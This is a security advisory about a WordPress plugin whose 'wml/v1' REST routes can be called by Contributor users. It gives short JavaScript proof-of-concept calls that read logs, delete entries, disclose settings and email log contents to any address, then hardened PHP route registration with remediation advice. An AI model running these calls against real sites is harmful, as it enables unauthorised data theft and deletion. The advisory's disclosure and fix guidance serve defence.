## https://sploitus.com/exploit?id=WPEX-ID:08F1D623-0453-4103-A9AA-2D0DDB6EB69E
The following actions, exposed as REST API routes under the `wml/v1` namespace, may be taken by a Contributor user:
---
/wml_logs - Information leak

Execute the following within a block editor page to read the logs:

```javascript
await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10}});
```
---
/wml_logs/delete - Arbitrary log deletion

Execute the following within a block editor page to delete a log entry, ensuring the `data` array includes a valid ID for a log entry:

```javascript
await wp.apiFetch({path: 'wml/v1/wml_logs/delete', method: 'POST', data: [1]});
```
---
/settings - Plugin settings disclosure

Execute the following within a block editor page to get the plugin settings:

```javascript
await wp.apiFetch({path: 'wml/v1/settings', method: 'POST', data: {callback: 'get'}});
```
---
/wml_logs/send_mail - Log contents sent to an arbitrary email address

Execute the following on any page of the site to send the information within a log to an arbitrary email address, ensuring the `id` parameter is a valid ID for a log entry.

```javascript
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com'})).text();
```
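All four issues above share one root cause: REST routes that a low-privileged but authenticated user can reach. The `X-WP-Nonce` header (or `wp.apiFetch`, which adds it automatically) only proves the request comes from a logged-in browser session; it is authentication, not authorization. Authorization for a WordPress REST route lives in its `permission_callback`. The block below is an added example, not the plugin's code or anything from this advisory: it shows how routes in the `wml/v1` namespace with the paths listed above could be registered so that only users holding `manage_options` (which a Contributor does not have) can call them, with request arguments validated before the handler runs. The handler names (`wml_example_*`) and the capability choice are assumptions for illustration.

```php
<?php
/**
 * Added example (not the plugin's or the advisory's code).
 * Route namespace and paths match the advisory; handler names and the
 * 'manage_options' capability are assumptions for illustration.
 */

// Authorization check shared by every administrative route.
// Returning false here makes WordPress answer 401/403 before the callback runs.
function wml_example_admin_only( WP_REST_Request $request ) {
    return current_user_can( 'manage_options' );
}

add_action( 'rest_api_init', function () {
    // Weak pattern (shown only to contrast): with '__return_true' the route is
    // reachable by anyone, and with no permission_callback at all any
    // authenticated role, including Contributor, passes straight through.
    //
    // register_rest_route( 'wml/v1', '/wml_logs', array(
    //     'methods'             => 'POST',
    //     'callback'            => 'wml_example_list_logs',
    //     'permission_callback' => '__return_true',
    // ) );

    // Hardened registration: every route gets the capability check, and routes
    // that take an id / recipient validate and sanitize those arguments.
    $id_arg = array(
        'required'          => true,
        'validate_callback' => function ( $value ) {
            return is_numeric( $value ) && (int) $value > 0;
        },
        'sanitize_callback' => 'absint',
    );
    $email_arg = array(
        'required'          => true,
        'validate_callback' => function ( $value ) {
            return false !== is_email( $value );
        },
        'sanitize_callback' => 'sanitize_email',
    );

    $routes = array(
        '/wml_logs'           => array( 'callback' => 'wml_example_list_logs',   'args' => array() ),
        '/wml_logs/delete'    => array( 'callback' => 'wml_example_delete_logs', 'args' => array() ),
        '/settings'           => array( 'callback' => 'wml_example_settings',    'args' => array() ),
        '/wml_logs/send_mail' => array(
            'callback' => 'wml_example_send_mail',
            'args'     => array( 'id' => $id_arg, 'to_email' => $email_arg ),
        ),
    );

    foreach ( $routes as $route => $spec ) {
        register_rest_route( 'wml/v1', $route, array(
            'methods'             => WP_REST_Server::CREATABLE, // POST
            'callback'            => $spec['callback'],
            'permission_callback' => 'wml_example_admin_only',
            'args'                => $spec['args'],
        ) );
    }
} );

// Assumed handler for /wml_logs/send_mail. The capability is re-checked here as
// defence in depth, so the handler stays safe even if a future refactor drops the
// permission_callback. Log lookup and the wp_mail() call are omitted; the point is
// that authorization and argument validation happen before any side effect.
function wml_example_send_mail( WP_REST_Request $request ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient permissions.', array( 'status' => 403 ) );
    }
    $id = (int) $request->get_param( 'id' );        // already absint()'d by the arg spec
    $to = $request->get_param( 'to_email' );        // already sanitize_email()'d
    // ... load log entry $id and mail it to $to ...
    return rest_ensure_response( array( 'sent' => true, 'id' => $id ) );
}
```

Two points worth checking when auditing a plugin for this class of bug: every `register_rest_route()` call should carry a `permission_callback` that tests a capability (WordPress 5.5 and later logs a `_doing_it_wrong` notice when it is missing), and the capability chosen should match what the handler does rather than merely `is_user_logged_in()`. For an endpoint that emails stored data, restricting the recipient to a fixed set (for example the site's `admin_email`) instead of accepting it from the request removes the exfiltration channel entirely, at the cost of some flexibility.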